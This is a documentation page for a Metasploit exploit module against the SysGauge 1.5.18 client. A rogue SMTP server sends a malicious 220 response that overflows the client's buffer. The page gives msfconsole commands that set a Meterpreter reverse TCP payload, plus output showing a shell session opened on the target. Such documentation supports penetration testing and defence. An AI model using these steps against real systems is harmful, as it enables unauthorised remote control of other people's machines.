documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
This module will setup an SMTP server expecting a connection from SysGauge 1.5.18 via its SMTP server validation. The module sends a malicious response along in the 220 service ready response and exploits the client, resulting in an unprivileged shell.
The software is available for download from SysGauge.
use exploit/windows/smtp/sysgauge_client_bofset payload windows/meterpreter/reverse_tcpset LHOST iprunSRVHOST or other applicable IP address in the SMTP configuration
in the program, and hit the "Verify Email ..." button.Here is how to typically execute the module. Note that the client must input this SMTP server information under SysGauge Options and hit the "Verify Email ..." button.
msf > use exploit/windows/smtp/sysgauge_client_bof
msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(sysgauge_client_bof) > exploit
[*] Exploit running as background job.
msf exploit(sysgauge_client_bof) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Server started.
[*] Client connected: 10.0.0.128
[*] Sending payload...
[*] Sending stage (957487 bytes) to 10.0.0.128
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500